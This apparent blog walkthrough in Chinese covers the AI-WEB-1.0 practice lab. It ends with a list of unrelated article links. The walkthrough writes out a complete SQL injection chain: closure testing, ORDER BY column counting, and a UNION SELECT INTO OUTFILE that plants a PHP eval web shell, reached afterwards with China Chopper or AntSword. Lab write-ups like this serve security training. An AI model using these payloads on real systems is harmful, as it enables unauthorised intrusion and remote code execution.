当前位置: 首页 > news >正文

CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令   /robots.txt  来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令  dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到  WWW 所在的根目录

7、确定闭合方式  1' #

8、确定字段

1' order by 3#

9、注入一句话“木马”

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索  /s   /up    /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

即可成功获取信息

安全

网络安全人人有责,切勿知法犯法

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • C++基础语法:析构函数
  • 【现代操作系统】1. intro
  • Java中的主要设计模式
  • ubuntu18.04下安装nvidia3090显卡驱动
  • 数据结构----栈
  • C语言指针详解-上
  • (七)Activiti-modeler中文支持
  • 『Z-Workshop』 The Graph workshop mini hackathon活动
  • IBERT 眼图机制
  • 使用Poi-tl对word模板生成动态报告
  • 利用 Python 的包管理和动态属性获取(`__init__.py` 文件和 `getattr` 函数)特性来实现工厂方法模式
  • RHEL8 配置epel源
  • 深入探讨C语言中的高级指针操作
  • 生产环境中MapReduce的最佳实践
  • 微信小程序在不同移动设备上的差异导致原因
  • 深入了解以太坊
  • 0x05 Python数据分析,Anaconda八斩刀
  • axios请求、和返回数据拦截,统一请求报错提示_012
  • IDEA常用插件整理
  • Java|序列化异常StreamCorruptedException的解决方法
  • JavaScript/HTML5图表开发工具JavaScript Charts v3.19.6发布【附下载】
  • js中forEach回调同异步问题
  • JS字符串转数字方法总结
  • MySQL数据库运维之数据恢复
  • node-glob通配符
  • node入门
  • SAP云平台运行环境Cloud Foundry和Neo的区别
  • Vue学习第二天
  • 对象引论
  • 回顾2016
  • ------- 计算机网络基础
  • 力扣(LeetCode)357
  • 那些年我们用过的显示性能指标
  • 前端技术周刊 2018-12-10:前端自动化测试
  • 实现菜单下拉伸展折叠效果demo
  • -- 数据结构 顺序表 --Java
  • SAP CRM里Lead通过工作流自动创建Opportunity的原理讲解 ...
  • 整理一些计算机基础知识!
  • ​Java并发新构件之Exchanger
  • ​VRRP 虚拟路由冗余协议(华为)
  • # Redis 入门到精通(一)数据类型(4)
  • #Js篇:单线程模式同步任务异步任务任务队列事件循环setTimeout() setInterval()
  • #Linux(权限管理)
  • #我与Java虚拟机的故事#连载08:书读百遍其义自见
  • ( 用例图)定义了系统的功能需求,它是从系统的外部看系统功能,并不描述系统内部对功能的具体实现
  • (17)Hive ——MR任务的map与reduce个数由什么决定?
  • (Redis使用系列) Springboot 使用redis实现接口Api限流 十
  • (附源码)计算机毕业设计ssm高校《大学语文》课程作业在线管理系统
  • (删)Java线程同步实现一:synchronzied和wait()/notify()
  • (转)创业的注意事项
  • *2 echo、printf、mkdir命令的应用
  • *算法训练(leetcode)第四十五天 | 101. 孤岛的总面积、102. 沉没孤岛、103. 水流问题、104. 建造最大岛屿
  • .[hudsonL@cock.li].mkp勒索加密数据库完美恢复---惜分飞
  • .NET Core 2.1路线图
  • .NET Core Web APi类库如何内嵌运行?